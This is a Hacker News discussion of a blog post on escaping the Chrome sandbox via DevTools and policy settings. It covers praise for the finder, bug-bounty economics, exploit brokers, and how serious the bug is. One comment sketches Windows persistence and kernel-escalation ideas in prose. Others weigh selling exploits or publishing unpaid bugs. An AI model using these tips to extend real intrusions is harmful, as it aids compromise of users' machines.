Hacker News new | past | comments | ask | show | jobs | submit login
Escaping the Chrome Sandbox Through DevTools (ading.dev)
407 points by vk6 28 days ago | hide | past | favorite | 77 comments



> You may have noticed that the page URL gets substituted into ${url}, and so to prevent this from messing up the command, we can simply put it behind a # which makes it a comment

Is there some validation logic or something on this policy that the URL must be passed to the "alternative browser" somewhere in the AlternativeBrowserParameters?


>I'm Allen, a high school student with an interest in programming, web development, and cybersecurity.

Very impressive!


Oh boy

What an amazing technical talent, sheer persistence, and excellent documentation and communication skills.

Not to mention the work ethic of responsible disclosure.

This person is going places!


Excellent writeup and work, reading this made me be right there along with you in the excitement buildup thoughout the discoveries. Thank you!

Well deserved reward!


That's a neat vulnerability chain and a great writeup. Appreciated the breakdown of the vulnerable code as well!

I'm always impressed by the simplicity of tricks like "Press F12 to try again", this is just so naughty :)


I live in Missouri; I pressed F12 once and the governor tried to get me arrested.



Reminds me of when I used this same API to debug Chrome OS's "crosh" shell and escape OS protections, also obtaining root access on developer devices. (CVE-2014-3172)

The author of this post had to bypass much more challenging obstacles. This is great work!


Oof. Too late in my night to dive into the guts of what's broken in WebUI validation, but good on this person for persisting and figuring it out. It's pretty standard to question and distrust toolchains in the things we deploy, but at the same time we put way too much trust in magically convenient dev tools from large companies like Google or MS. Mostly because we want to get on with writing and testing our own code, not worry about whatever the fuck is lurking in Chromium or VSCode.


God damn that is one of the best things I’ve ever read.

Super clever sleuthing


Thanks for the writeup, very interesting and detailed! and the effort of digging through the browser code to find all this is fantastic!


Wow, wow and wow for a High school student.


Chromium project decides to remove chrome://net-internals because the page is too complex

... and adding chrome://policy with half baked JSON edit support.


really sick writeup, felt like a thriller novel


Awesome vuln chain.


Given the severity, I can't help but feel that this is underpaid at the scale Google is at. Chrome is so ubiquitous and vulnerabilities like these could hit hard. Last thing they need to do is to send the signal that it's better to sell these on the black market.


I hate that every time a vulnerability is posted, someone has to argue about whether the bounty is high enough. It’s always followed by, "blah blah, they're pushing whitehats to sell it on the black market."

Vulnerabilities will always sell for more on the black market because there’s an added cost for asking people to do immoral and likely illegal things. Comparing the two is meaningless.

To give a straightforward answer: no, I don’t think $20k is underpaid. The severity of a bug isn't based on how it could theoretically affect people but on how it actually does. There's no evidence this is even in the wild, and based on the description, it seems complicated to exploit for attacks.


> The severity of a bug isn't based on how it could theoretically affect people but on how it actually does

No, it's priced on demand and supply like anything else; bug bounties are priced to be the amount that Google thinks it takes to incentivise hunters to sell it to them, vs. to black hats.


I know not everyone shares my world-view, but I need to be literally starving to consider selling whatever I discover to a criminal.

principles > wild market


> principles > wild market

Your principles will be gone by the time the 10th company starts to sue you for a public disclosure you did in good faith.

There's a reason why nobody wants to use their real name and creates new aliases for every single CVE and report.

Principles are discrepancies with the law, they don't exist. If the law dictates a different principle than your own one, guess what, you'll be the one that is in jail.

Whistleblower protection laws are a bad joke, and politicians have no (financial) incentives to change that.


Not going to name names, but someone I know was happy when his workplace was acquired by a bigger company from another country. He was the most senior developer, had done the heavy lifting, the product was did a good job for its happy users and the buyer would continue that, and last but not least, he'd be rich. Admittedly part of the agreement was a handshake, there had been so much to do, they'd worked insane amounts of overtime and some paperwork had been deferred…

He got nothing. No money at all. The CEO pretended to have forgotten every verbal agreement.

You only need to experience that kind of thing once to change your mind.


To change your mind about making sure everything is in writing in a binding contract?


I'd guess most people would react in one of three ways, including that one. I can understand all three.


I think many people have internalised a purely profit driven world view, and it is what they expect to be the main motivator or themselves and others.


TL;DR: a random stranger is most likely a nice and honest and principled human being. A sufficiently large population of random strangers behaves approximately like a population of amoral(ish), rational(ish) economic actors. If your process involves continuously drawing a stranger at random from a population, then you can't avoid taking the economic view, because you eventually will draw a crazy or malevolent or economically-rational stranger.

--

GP wouldn't sell their discoveries to the criminals. But would they consider selling them to a third party as an intermediary, perhaps one that looks very much above board, and specializes in getting rewards from bug bounties in exchange for a percentage of payout?

I don't know if such companies exist, but I suspect they might - they exist for approximately everything else, it's a natural consequence of specialization and free markets.

Say GP would say yes; how much work would they put into vetting the third party doesn't double-dip selling the exploit on the black market? How can they be sure? Maybe there is a principled company out there, but we all know principled actors self-select out of the market over time.

Or, maybe GP wouldn't sell them unless starving, but what if agents of their government come and politely ask them to share, for the Good of their Country/People/Flag/Queen/Uniform/whatever?

Or, maybe GP wouldn't sell them unless starving, but what is their threshold of "starving"? For many, that wouldn't be literally starving, but some point on a spectrum between that and moderate quality-of-life drop. Like, idk, potentially losing their home, or (more US-specific I guess) random event leaving them with a stupidly high medical bill to pay, etc.

With all that in mind, the main question is: how do you know? How does Google know?

The reason people take an economic view of the world is because it's the only tool that lets you do useful analysis - but unlike with the proverbial hammer that makes everything look like a nail, at large enough scale, approximately everything behaves like a nail. Plus, most of the time, it only takes one.

GP may be principled, but there's likely[0] more than one person making the same discovery at the same time, and some of those people may not be as principled as GP. You can't rely on only ever dealing with principled people - like with a game of Russian roulette, if you pull the trigger enough times, you'll have a bad day.

--

[0] - Arguably, always. Real breakthrough leaps almost never happen, discoveries are usually very incremental - when all the pieces are there, many people end up noticing it and working on the next increment in parallel. The first one to publish is usually the only one to get the credit, though.


But you probably wouldn't take the time to write up a nice report and send it to Google either if they didn't pay. Or even try to find the bug in the first place.

(But yea, I think lots of people would sell exploits to criminals for enough money.)


Yeah I think this is the part that never gets mentioned. I'd like to think that most people wouldn't immediately go to selling on the black market, even if the pay is better it's just too risky if you get caught.

But if you don't pay people enough in the first place... then they're just going to spend their time doing other things that actually do pay and your bugs won't get caught except by those who are specifically trying to target you for illicit purposes.


Not worth it. Because now you are in the underbelly.


I mean the alternative isn’t that you are selling it on the black market, it’s that you expose the issue in a blog post and the first time google knows is because one of their employees see the post here on hacker news.

You are essentially been paid to fill out forms and keep your mouth shut.


This assumes efficient markets which doesn't exist when there is a monopoly on legitimate buyers. The value any one individual puts on a thing does not a market make.


Is it really a amonopoly though if there are multiple companies offering bug bounties? If the whitehat feels he is underpaid he could just go look for bugs for another product.


The market or lack thereof is for a product. That researchers can work on a different product is a market for labor.


There's a clear cut between selling it to Google and selling it to black hats. White hats mostly have a career in cyber security and they will not disclose a vulnerability to a compromised party regardless of the price. Cyber security researchers will like having their name attached to a CVE or a fix in a well known open source project which is arguably worth more than 20K to them. If someone finds out you sold a vulnerability, or exploit, to a hostile party, your career is over.


Yea, legitimate with illegitimate is a weird kind of calculation, as the risk with illegitimate market is to end up in jail, and few people want to calculate the monetary value of lost time due to incareration and all the fallout that comes with it.

The more interesting question would be, if the bug bounty is enough to keep legitimate researchers engaged to investigate and document the threats. But..

The bug bounty itself is only a drop in the bucket for security companies, as it's a, unsteady and b, not enough to cover even trivial research environment cost.

Pratcially it's a nice monetary and reputation bonus (for having the name associated with the detection) in addition to the regular bussiness of providing baseline security intelligence, solutions and services to enterprises, which is what earns the regular paycheck.

Living from quests and bonties is more the realm of fantasy.


Is it actually illegal to sell an exploit to the highest bidder? Obviously deploying or using the exploit violates any number of laws.

From a speech perspective, if I discovered an exploit and wrote a paper explaining it, what law prevents me from selling that research?


(I'm not a lawyer but) I think that would involve you in the conspiracy to commit the cybercrime, if you developed the exploit and sold it to an entity that used it with wrongful intent.

https://www.law.cornell.edu/uscode/text/18/1029 gives the definition and penalties for committing fraud and/or unauthorized access, and it includes the development of such tools.

A lot of it includes the phrasing "with intent to defraud" so it may depend on whether the court can show you knew your highest bidder was going to use it in this way.

(apologies for citing US-centric law, I figured it was most relevant to the current discussion but things may vary by jurisdiction, though probably not by much)


You only risk prison if you sell it to the "bad guys" on the black market. Sell it to people who can jail the bad guys instead; that is, our governments.


I actually don't believe so.

Not everything is priced on demand and supply -- at least not strictly.

Of course the potential of abuse is part of the equation, but I think Google (or similar large companies) simply has a guideline of how the amount of the bounty is decided, than surveying the market to see what its "actual value" is. It's not exactly a free market, at least not on Google's side.


I assure you that when Google set those bounties, they thought about how much they would have to pay white hats to make them do the right thing. Of course, it's a highly illiquid market (usually there's just one seller and only a handful of buyers), and so the pricing is super inefficient (hence based on guidelines and not surveying on every individual bug), but the logic remains.


> it's priced on demand and supply like anything else

You should complete the sentence: “It’s priced based on demand and supply in legal markets like anything else.”

There are, of course, other markets where things like this are traded, but that’s a different story. That said, I think the author is free to negotiate further with Google if they believe it’s worth it.


I suspect the fact there is potentially a wider addressable market via the black market probably has more to do with the price setting mechanism than an immorality premium.

Although, maybe there is something to the immorality/illegality tax in this case. The author is in high school (how cool is that!?) and the article would probably hit differently to perspective employers if they were detailing the exploit they had sold to NK (which is to say nothing of how NK would feel about the sunlight).


I've made lots of money with bug bounties over the years and mostly stopped this year in favor of private consulting. Companies will try anything to get out of paying, even through the major platforms.

I once found a bug where I could access all of the names, addresses, emails, and phone numbers of all users for this new contest this company was running. I even found public announcements on Twitter. They told me this was a staging environment and wouldn't pay me. It clearly wasn't as the urls were linked directly to the announcement.

Another time, a company had an application that allowed other companies to run internal corporate training. I was able to get access to all accounts, information, and private rooms of all fortune 500 companies using it. They initially tried to get out of it by telling me they didn't own the application anymore (and immediately removed it from scope). I had proof it was in scope at the time I found the bugs (and even confirmed it before-hand with the platform).

Luckily, the platform I went through fought this and I got my payout...6 months later.

Even now, I have 50+ bugs that were triaged over the past year and the companies just sit on them and won't respond or pay out. Major platforms like Hackerone and Bug crowd don't seem to protect their researchers at all.


If they make excuses, sit on it, or dont pay out, release those bugs into the public domain, thats how this system works!


While I would love to do that, I still enjoy making a living in security.


Im genuinely interested here. If you made some security bugs public due to the company not cooperating properly, would that damage your reputation in the community to the point it would jeopardise your career opportunities?

From the outside looking in, it seems that the community would applaud that behavoir, but I am not familier.


> sell these on the black market.

How? I always see this mentioned but it seem impractical to me. I've discovered bugs which have paid out a few thousand dollars - big corporates have well publicised schemes, but I've no idea how I would go about selling it to a criminal.

Even if I did know where to find them - how would I trust them? Can I tell they're not really the police doing a sting?

If they paid me, how would I explain my new wealth to the tax authorities?

Once the criminal knows they've paid me, what's to stop them blackmailing me? Or otherwise threatening me?

Oh, and I won't be able to publish a kudos-raising blog post about it.

How much would a criminal have to pay me to take on that level of risk?

Should Google pay out more for this? Probably. Is the average security researcher really going to take the risk of dealing with criminals in the hope that they pay a bit more? Unlikely.


> How?

Huh... First result in google for "selling exploits" shows it's not only criminals who are buying exploits:

https://zerodium.com/program.html

(up to $500K for Chrome RCE, but probably not for this since requires extension install)

Another result is the Wikipedia article, which also talks about these gray markets:

"Gray markets buyers include clients from the private sector, governments and brokers who resell vulnerabilities."


Zerodium sells to government intelligence agencies, so I guess it depends on your definition of “criminals.”


Sell it to governments. Biggest good guys bad guys.


I think maintaining anonimity is the key. Ensuring getting paid is the next thing. I'm not sure how you can achieve this in practice.


If you can trick someone into installing a malicious extension with arbitrary permissions, you can already run arbitrary code on every webpage they visit, including their logged in bank, social media, etc.

You think an attacker is right now thinking "Man, I know exactly how to make a lot of victims install an extension, but I can only steal their coinbase wallet and bank accounts, if only there was a way I could run calc.exe on their machine too..." who's going to pay more than $20k to upgrade from "steal all their money" to "steal all their money and run calc.exe"?


No, "calc.exe upgrade" is definitely worth more than $20k to criminals, as it's a huge qualitative jump in capabilities. A full-privileged browser extension can only mess with things you actively visit in your browser. But give it "calc.exe privileges", and it now can mess with anything that touches your computer, with or without your involvement. Private keys on your hard drive, photos on your phone that you plugged in via USB to transfer something, IoT devices on your LAN - all are fair game. And so many, many other things.


Correct me if I’m wrong, but remote code execution has the advantage of being able to access information without the user being involved at all. Sure the user needs to install and trigger the exploit, but whatever code the attacker runs doesn’t require the user to interact with certain urls. If you can launch arbitrary programs, you can probably install all sorts of nasty things that are potentially more lucrative than the victim’s bank or coinbase accounts.


It breaks the assumption that Chrome is sandboxed and something I do as a user including installing an extension will not have an impact outside of Chrome. A new process outside Chrome to call your own and do whatever you want with.

You're on Windows? Download a binary, create some WMI triggers and get executed at every boot as the same user (requires no elevation for same user, if Admin, you can get NT_AUTHORITY). If you find something to elevate to Administrator you could also patch the beginning of some rarely used syscall and then invoke it and get a thread to yourself in the kernel. These things tend to almost chain themselves sometimes. At least on Windows it feels that way.

Also the user doesn't have to navigate to a specific URL in the final form, just needs to open devtools after installing the extension.


I actually think escaping the browser is a huge leap and a frequently a primary goal for a black hat. Eg someone trying to install ransomware, or a spy targeting a specific person or org.

From outside the browser they can exploit kernel bugs to elevate their privilege; and they can probe the network to attempt to move laterally in the org.

So while I think your comment is thoughtful, its thoughtfulness made me think of agreeing with the opposite :-)


that's not entirely true: if you look at the manifest on the github repo you can see that it only requires the `tab` permission, which, when installed, will make the extension seem quite safe, since it should not have access to the content of your pages


Run calc.exe actually means steal money of everybody in their entire organization or blackmail the entire organization by encypting all the data they need to function.


If compromising a single machine of a user already compromises your entire orgs IT, you’re doing something wrong, right? Shouldn’t a normal user lack privileges to do this much damage to the network?


Everybody is doing something wrong.


they say: `This also means that, unfortunately, the bug will not work on stable builds of Google Chrome since the release channel is set to the proper value there`

So it's only working on Chromium, a way smaller attack surface than the whole Chrome users


Slight correction: it worked on Chromium and on Google Chrome canary.


"what percentage of grandmas would lose their life savings if they stumble across this bug" is the metric I use to determine severity.

And in this case, it requires a chain of unlikely events. The user tricked into installing an extension (probably not one from the store, which is now particularly hard on windows). The user tricked into opening devtools.

It's gonna be sub-1%. Certainly still worth fixing, but nowhere near as bad as a universal XSS bug.


Not only that, but it doesn't work on Google Chrome releases, only the (upstream) Chromium, and Google Chrome canary. Very few people use raw Chromium all by its lonesome and I would guess only for testing/development, not downloading random extensions.


I use Chromium, because I'm on Ubuntu. (Admittedly, I don't use it very often. I tend to be loyal to Firefox most of the time.)


If it had worked for Chrome it should (and maybe would) have been a lot higher. Also: doesn't it use an extension?

I was under the impression that extensions were un-sandboxed and basically just executables I trust to run with the same privilege as the browser itself (which is a lot, at least under windows).


No, extensions are tied to the browser sandbox and they also have to specify their permissions beforehand. They can request fairly wide permissions inside the browser sandbox, yes, but they have to explicitly list the permissions they require in the manifest and the browser will ask you if you're fine with those before installing. Outside of the browser itself, the extensions can't do pretty much anything outside of sending messages to applications that explicitly register to receive them from them.


Chrome needs to be rewritten in Rust asap


No it doesn't? This has nothing to do with memory safety. Its a logical error, which Rust physically cannot prevent.


This had nothing to do with Chrome, but rather Chromium.

>Considering that I'm using plain Chromium and not the branded Google Chrome, the channel will always be Channel::UNKNOWN. This also means that, unfortunately, the bug will not work on stable builds of Google Chrome since the release channel is set to the proper value there.


Malwares are going to be written in rust; What difference does it make? Also Its not memory based vulnerability but policy based vulnerability.


But at least the vulnerability would be blazingly fast


Did you even read the post?


Is it bad for Chrome to have vulnerabilities? I think long-term is really good. People need to get away from the browser monopoly (because it really is only Chrome here holding the power) and support the ecosystem


> Is it bad for Chrome to have vulnerabilities?

Yes, obviously it is. Is it bad for others/the public? Probably, but not as bad as it is for Chrome.

> because it really is only Chrome here holding the power

I'm not sure this is true. Apple pretty much forces usage of their browser engine on iOS, and heavily try to get people to use Safari on macOS. Windows push Edge pretty hard on their OS, and their browser engine is pretty much intertwined to the OS so you can't not use it. Both of them say they let you change the default, but various links in the OS would still open Edge/Safari even if you have the default browser changed. Not sure if that's on purpose or not.


> and heavily try to get people to use Safari on macOS

how so? on any new macOS install, I use Safari to download Firefox. After that, I never think about Safari until I'm trying to use its DevTools to look at iDevices. I never get a nag screen about Safari. I have never had default browser changed after any updates.

so where exactly is this heavy handed attempt at forcing Safari down anyone's throat?


I'm not on a macOS machine right now, so can't show you any specific examples, but scattered links/actions across Apple applications still open Safari from time to time (I think Xcode was especially gnarly for a long time), as it seems at one point Apple hardwired the links/actions to open Safari rather than the user set browser. Search for `site:discussions.apple.com wrong browser` in your favorite search engine and you'll get some actual examples.


Back when I used to run Chrome, I noticed one case that would do this (it was buried in Spotlight), but it didn't seem intentional (especially because web search results in Spotlight always respected the default browser setting, and showed the correct browser icon as well). I use Safari now though, so I won't be finding any more cases like that anytime soon.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: